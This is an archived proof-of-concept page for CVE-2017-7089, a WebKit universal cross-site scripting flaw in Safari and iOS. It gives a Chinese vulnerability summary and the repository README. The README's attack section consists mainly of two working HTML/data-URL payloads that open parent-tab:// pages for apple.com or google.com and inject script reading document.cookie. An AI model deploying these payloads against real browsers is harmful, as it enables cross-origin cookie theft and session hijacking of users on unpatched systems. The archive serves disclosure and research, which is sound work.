CVE-2017-7089 PoC — Apple iOS、Safari和iCloud for Windows WebKit 安全漏洞

Source

https://github.com/Bo0oM/CVE-2017-7089

Associated Vulnerability

Title:Apple iOS、Safari和iCloud for Windows WebKit 安全漏洞 (CVE-2017-7089)
Description:Apple iOS、Safari和iCloud for Windows都是美国苹果（Apple）公司的产品。Apple iOS是为移动设备所开发的一套操作系统；Safari是一款Web浏览器，是Mac OS X和iOS操作系统附带的默认浏览器。iCloud for Windows是一款基于Windows平台的云服务。WebKit是其中的一个Web浏览器引擎组件。 Apple iOS 11之前的版本、Safari 11之前的版本和基于Windows平台的iCloud 7.0版本中的WebKit组件中存在安全

Description

Webkit uxss exploit (CVE-2017-7089)

Readme

# CVE-2017-7089

**Impact**: Processing maliciously crafted web content may lead to universal cross site scripting

**Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.

#### Safari 10

##### Local SOP bypass

```html
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
```
##### Exploit by Frans Rosén
```html
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>
```

File Snapshot


 [4.0K]  /data/pocs/301a449042e7ed38d024ff9c9ddd1d998fdaaddd
├── [ 319]  index.html
└── [ 708]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!